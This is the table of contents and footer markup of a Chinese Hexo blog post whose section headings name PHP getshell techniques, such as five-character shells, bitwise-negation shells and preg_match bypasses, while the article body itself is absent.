              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5个字符getshell"><span class="nav-number">2.</span> <span class="nav-text">5个字符getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前置知识"><span class="nav-number">2.1.</span> <span class="nav-text">前置知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#思路"><span class="nav-number">2.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#脚本"><span class="nav-number">2.3.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#取反getshell"><span class="nav-number">3.</span> <span class="nav-text">取反getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前置知识-1"><span class="nav-number">3.1.</span> <span class="nav-text">前置知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#思路1"><span class="nav-number">3.2.</span> <span class="nav-text">思路1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#脚本-1"><span class="nav-number">3.3.</span> <span class="nav-text">脚本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#思路2"><span class="nav-number">3.4.</span> <span class="nav-text">思路2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#脚本-2"><span class="nav-number">3.5.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#绕过preg-match"><span class="nav-number">4.</span> <span class="nav-text">绕过preg_match()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小结"><span class="nav-number">5.</span> <span class="nav-text">小结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>
    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sketch_pl4ne</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">39.7k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
